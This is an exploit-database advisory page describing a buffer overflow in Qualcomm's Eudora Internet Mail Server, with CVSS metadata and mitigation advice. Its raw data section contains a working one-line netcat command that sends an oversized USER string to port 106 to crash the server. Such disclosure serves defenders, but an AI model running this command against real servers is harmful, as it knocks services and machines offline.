header-logo
Suggest Exploit
vendor:
Eudora Internet Mail Server
by:
Unknown
7.5
CVSS
HIGH
Buffer Overflow
Buffer Overflow
CWE
Product Name: Eudora Internet Mail Server
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: Unknown
Related CWE: Unknown
CPE: cpe:2.3:a:qualcomm:eudora_internet_mail_server:*:*:*:*:*:*:*:*
Metasploit:
Other Scripts:
Platforms Tested:
Unknown

Buffer Overflow in Qualcomm’s Eudora Internet Mail Server

There is a buffer overflow vulnerability in Qualcomm's Eudora Internet Mail Server. By connecting to its TCP port number 106 and issuing the USER command followed by a string over a thousand bytes in length, the server can crash, potentially causing the machine to go down.

Mitigation:

It is recommended to update to the latest version of Qualcomm's Eudora Internet Mail Server to mitigate this vulnerability. Additionally, implementing proper input validation and size limits for user commands can help prevent buffer overflow attacks.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/75/info

There appears to be a buffer overflow in Qualcomm's Eudora Internet Mail Server. If you connect to its TCP port number 106 and issue the USER command followed by a string over than a thousand bytes in length the server will crash possibly taking down the machine with it.

$ echo USER `perl -e 'print "A"x2048'` | nc target.host.com 106

Navigation

Suggest Exploit

Services By CQR